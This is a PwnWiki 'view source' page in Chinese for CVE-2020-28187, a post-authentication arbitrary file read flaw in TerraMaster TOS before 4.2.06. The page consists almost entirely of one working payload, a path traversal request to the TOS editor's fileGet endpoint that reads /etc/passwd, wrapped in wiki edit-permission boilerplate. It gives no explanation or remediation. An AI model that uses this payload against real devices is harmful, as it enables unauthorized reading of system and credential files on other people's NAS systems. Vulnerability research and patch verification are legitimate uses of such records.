View source for CVE-2020-28187 TerraMaster TOS 後台任意文件讀取漏洞

From PwnWiki

← CVE-2020-28187 TerraMaster TOS 後台任意文件讀取漏洞

You do not have permission to edit this page, for the following reasons:

The action you have requested is limited to users in the group: Users.
You must confirm your email address before editing pages. Please set and validate your email address through your user preferences.

You can view and copy the source of this page.

==漏洞影響==
TerraMaster TOS < 4.2.06


==Payload==
<pre>
/tos/index.php?editor/fileGet&filename=../../../../../../etc/passwd
</pre>

Return to CVE-2020-28187 TerraMaster TOS 後台任意文件讀取漏洞.

Retrieved from "https://pwnwiki.com/index.php?title=CVE-2020-28187_TerraMaster_TOS_後台任意文件讀取漏洞"